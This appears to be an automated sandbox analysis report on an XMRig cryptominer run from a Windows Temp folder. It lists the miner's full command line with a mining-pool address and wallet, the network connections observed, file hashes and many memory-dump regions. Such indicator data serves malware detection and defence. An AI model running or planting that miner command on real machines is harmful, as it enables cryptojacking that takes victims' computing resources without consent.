C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
N/A 10.127.0.1:12000 tcp
N/A 10.127.0.1:12000 tcp
N/A 10.127.0.1:12000 tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
BE 2.17.107.98:443 www.bing.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 98.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
N/A 10.127.0.1:12000 tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 195.98.74.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4476-14-0x0000028AFE4B0000-0x0000028AFE4D0000-memory.dmp

memory/4476-15-0x0000028AFFDC0000-0x0000028AFFDE0000-memory.dmp

memory/4476-16-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-19-0x0000028AFFDE0000-0x0000028AFFE00000-memory.dmp

memory/4476-18-0x0000028AFFE00000-0x0000028AFFE20000-memory.dmp

memory/4476-17-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-20-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-21-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-22-0x0000028AFFE00000-0x0000028AFFE20000-memory.dmp

memory/4476-23-0x0000028AFFDE0000-0x0000028AFFE00000-memory.dmp

memory/4476-24-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-25-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-26-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-27-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-28-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-29-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-30-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-31-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-32-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-33-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-34-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-35-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-36-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-37-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-38-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-39-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-40-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-41-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-42-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-43-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-44-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-45-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-46-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-47-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-48-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-49-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-50-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-51-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-52-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-53-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-54-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-55-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-56-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-57-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-58-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-59-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-60-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-61-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-62-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-63-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-64-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-65-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-66-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-67-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-68-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-69-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-70-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-71-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-72-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-73-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-74-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-75-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-76-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-77-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-78-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-79-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-80-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-81-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-82-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp